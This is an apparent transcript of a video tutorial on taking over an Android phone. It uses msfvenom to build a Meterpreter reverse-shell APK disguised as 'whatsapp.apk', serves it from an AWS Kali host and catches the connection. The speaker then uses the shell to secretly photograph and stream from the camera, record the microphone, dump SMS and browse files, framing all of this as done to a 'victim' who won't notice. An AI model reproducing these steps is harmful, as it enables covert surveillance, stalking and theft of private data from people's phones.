Hi guys, I'm Swapnil Shukla and I'm a security researcher. Today I am going to explain you how to take a Android reverse shell over a public network using AWS. So in this we'll be using a Kali EC2 instance which will be having a public IP, and also to show you my mobile on my laptop screen I'll be using AirDroid. So this is the AirDroid tool, which is basically used to mirror the screen of your physical device, mobile device, onto the laptop. So let's start with the AWS. So click on your Kali EC2 instance and start the instance. Click on Yes Start. So once your Kali instance will get started, you can see the public IP address of your machine. Now log in to your machine using SSH. Once you are inside the machine, use sudo su hyphen to get the root access of that machine. Now when I go to my documents folder, I have already created two folders with the name exploit and vulnerable apk. So in the vulnerable apk folder we are going to basically create a payload, msfconsole payload, which will be a apk payload, which we are going to use to exploit the Android phone and get the reverse shell of the Android phone. So type the command msfvenom-p android metapreter reverse tcp. In the LHOST, enter the public IP of your EC2 instance, and in the LPORT, enter the port on which you want to listen to the reverse shell on your EC2 Kali instance. So I have created this payload with the name whatsapp.apk so that it will look little bit genuine to the victim, and mostly people will install it on their phone. Now you have to install this vulnerable whatsapp.apk app onto the mobile device. So to install this apk onto that mobile device, you need to actually download it from somewhere. So here I'm going to start the Python server using command python-m simple http server, and in this case I'll be using port 8080. Guys, remember to close this server when you are listening on the same port of your Kali machine. So I'll go to my mobile phone, I'll click on Chrome browser and type the IP address of your AWS machine, which is 13.235.86.124 colon 8080. Now here you can see whatsapp.apk. You can see the whatsapp.apk, which is a vulnerable apk. Just click on whatsapp.apk and download it. Once you have downloaded the application, you need to install this application onto the mobile device. So imagine a scenario where you are taking a victim's phone just for 5 minutes, or just let's say for 2 minutes, and you downloaded this apk onto his machine, onto his device, and you installed this application. So now when I go to my download folder, I can see whatsapp.apk. So before installing this apk, what I'm going to do here, I'm going to stop this server that I started on port 8080, because I'm going to use 8080 same port to listen reverse shell from the Android machine. So to listen, I'm going to use the other folder, so that whatever I'll be downloading or whatever the exploit I'll be doing, let's say I'll be taking screenshot and all, that will also get saved to the exploit folder. So let's go to the exploit folder. Here open another tab, and in the another tab take the SSH of your EC2 Kali instance and browse to your same folder, which is exploit. First I'm getting a root access onto this machine, again on the new tab. What we are going to do with the other folder, that I'll let you know later in this video. So first we are going to use msfconsole. So it will take a little while to start. So use exploit multi-handler to listen a Metapreter shell. Set the LPORT to 8080 and set the LHOST to 13.235.86.124 and set the payload as Android Metapreter reverse TCP. Now as you can see, this is the IP address of our AWS machine, public IP, and this is the port on which we are going to get the reverse shell. Now enter exploit. So here I have entered the exploit, and so my Metapreter is listening for reverse shell if I am getting any. So to get the reverse shell, you need to install this whatsapp.apk onto the device, onto the victim's phone. Click on install. Once the APK is installed and you open this APK onto the victim's phone, you can see you'll receive a Metapreter reverse shell onto your EC2 Kali instance. So let me type sysinfo. You can see after typing sysinfo, you can see this is Android 6.0.1 Linux, which is the Android version of my Android tablet which I am using to show this demo. So I type the help. In this you can see what all you can do. You can do screen share, screenshot, you can do webcam chat with that person and he'll be surprised, and you can do mic recording. You can record the voice from the phone, and also you can stream, webcam streaming you can do. You can take the web snap without even the victim knowing. You can check all the installed application onto this phone by typing a command app list. So let me quickly show you what else we can do once you have a reverse shell of the Android phone. As you can see, I am here in the download folder of the mobile. From the reverse shell, I can browse to all the folders which are available onto the device. Currently we are in com.metasploit.stage/file folder. Let's browse to SD card by typing cd/sd card/. You can see all the folders which are there on the victim's phone is also visible from the reverse shell. So here what I am trying to show you, that you have the full access of a victim's phone. So when I go to download folder, I can see all the application and the whatever files are available inside the download folder. Now let's do something else. Let's see what else we can do using this. Now by typing a command, just a second. Okay, now just by typing a command webcam-snap, and so what I am doing here right now, I am checking for all the webcams. So in my tab there is only one webcam which can be used as back cam or the front camera as well, by using webcam-list. Now to take the screenshot or take the snap using this phone, just type a command webcam-snap hyphen I 1. 1 is for the number, so if there will be two cameras, the numbers will be 1 and 2, and here in this case there is only one camera, so 1 is the number of the first camera, that is the index which is used. So now go to your download documents folder. Inside your documents folder you can see exploit and one apk. Now go to your exploit folder. Now you can see one image got captured. So let's open this image. How will you open this image? So to open this image, again I'll start a Python server using python -m simple http server, but this time I'll be using port number 8000. So once our server started, go to that IP address and server and click on to the image. From your local machine you will be able to access the exploit folder. So as I'm using a Lenovo tablet which is not having a very good quality camera, so we are not able to see anything clearly, so I have taken a new image. So when you go to the next image, you can see I am flashing my mobile light onto the camera. This is a very low quality VGA camera of this Android phone, and I was not having any Android phone, so I just use this tablet, and this camera's quality is not that great. So this is what you can do. Even the victim won't come to know that someone is using his or her camera and clicking snaps from the phone. Without even knowing the victim, we can take images. Now let me try mic recording of 20 seconds. So just type the command record -mic -d. -d is the time for which you want to record, and 20 is for the time in seconds. So now I'll go to the same exploit folder or from my local machine by clicking the by typing the IP address. You can see this audio file .wav file. Now let's try something else. So I'm going to dump SMS. So there is a command dump -SMS, and it will dump the SMS in the same directory exploit. As you can see here, all the SMS which a person has received, or your victim SMS, you will be able to see. Now let's try something else. Let's see what else we can do using this. We can take the shell access. So this is a Metapreter shell, and you can go to the actual shell of the machine, and which is Adb shell. Remotely you will be having the access of Adb shell of the same device, and as you can see on the other side, the device is switched off, and not switched off, actually it is screen lock, and still I am able to do whatever I want. I can go to any folder, any directory, just by typing commands like ls or cd /sd card /, or if I want to take any images from this machine, I'll directly go to dcim folder, which is basically a default folder for storing all the images. Now let's try something else. Let's do a web streaming using a command webcam-stream. You can see as this is I'm using EC2 instance, and this will be streaming in HTML, so I need to reload this page every time. You can see this is a live feed of the Android camera, and on the screen nothing will be there. Thank you guys, thank you for watching this video.